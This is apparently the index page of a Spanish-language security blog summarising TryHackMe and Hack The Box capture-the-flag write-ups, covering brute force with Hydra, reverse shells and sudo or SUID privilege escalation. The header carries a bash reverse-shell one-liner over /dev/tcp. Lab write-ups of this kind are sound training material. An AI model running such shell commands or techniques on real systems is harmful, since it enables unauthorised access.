sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
TryHackMe - Year of the Rabbit
· ✍️ sckull
ftp brainfuck vim sudo privesc
Year of the Rabbit es una maquina de TryHackMe, la maquina nos proporciona un wordlist que encontramos en una imagen y utilizamos en FTP para realizar un ataque de fuerza bruta con Hydra, tras acceder encontramos un pequeño que nos proporciono credenciales para acceder por SSH. Cambiamos de usuario con contraseñas almacenadas. Escalamos privilegios con una vulnerabilidad en Sudo y con Vi.
TryHackMe - Year of the Rabbit
TryHackMe - Break Out The Cage
· ✍️ sckull
ftp steganography vigenere
Break Out The Cage es una maquina de TryHackMe, presenta retos para obtener credenciales y acceso a la maquina, para el movimiento lateral analizamos un script y modificamos un archivo dependiente. Un reto nos permitió obtener la contraseña del usuario root.
TryHackMe - Break Out The Cage
TryHackMe - Fowsniff CTF
· ✍️ sckull
telnet pop3 pam_motd
Fowsniff CTF es una maquina de TryHackMe, presenta un reto OSINT donde obtuvimos credenciales que, junto con Hydra logramos obtener acceso a POP3 (Protocolo de Oficina Postal), en este ultimo encontramos contraseñas y usuarios las cuales utilzamos en Hydra para obtener acceso por SSH. Editamos un script que pertenece a pam_motd y que es ejecutado por root para escalar privilegios.
TryHackMe - Fowsniff CTF
TryHackMe - Pickle Rick
· ✍️ sckull
Pickle Rick es una maquina de TryHackMe de tipo CTF Like presenta algunos retos y preguntas.
TryHackMe - Pickle Rick
TryHackMe - Anonymous
· ✍️ sckull
ftp smbclient suid
Anonymous es una maquina de TryHackMe, dentro del servicio FTP encontramos un script que realiza una "limpieza", supusimos que este era ejecutado por algun cron por lo que reemplazamos su contenido con una shell inversa para obtener acceso. Utilizando el comando env con permisos SUID obtuvimos acceso como root.
TryHackMe - Anonymous
TryHackMe - Anthem
· ✍️ sckull
rdp umbranco
Anthem es una maquina de TryHackMe, presenta el CMS Umbranco, encontramos unos posts que nos permitieron encontrar credenciales, mismas que utilizamos en RDP. Un archivo oculto al cual le dimos permisos contenia una frase que utilizamos para obtener acceso privilegiado.
TryHackMe - Anthem
Hack The Box - Monteverde
· ✍️ sckull
azureAD enum4linux smbmap evil-winrm
Monteverde expone SMB y LDAP donde obtuvimos una lista de usuarios los cuales utilizamos como contraseña para enumerar SMB y obtener credenciales almacenadas que nos dieron acceso por WinRM. El usuario pertenece al grupo Azure Admins lo que permitio conectarnos a la base de datos y obtener credenciales para obtener acceso privilegiado.
Hack The Box - Monteverde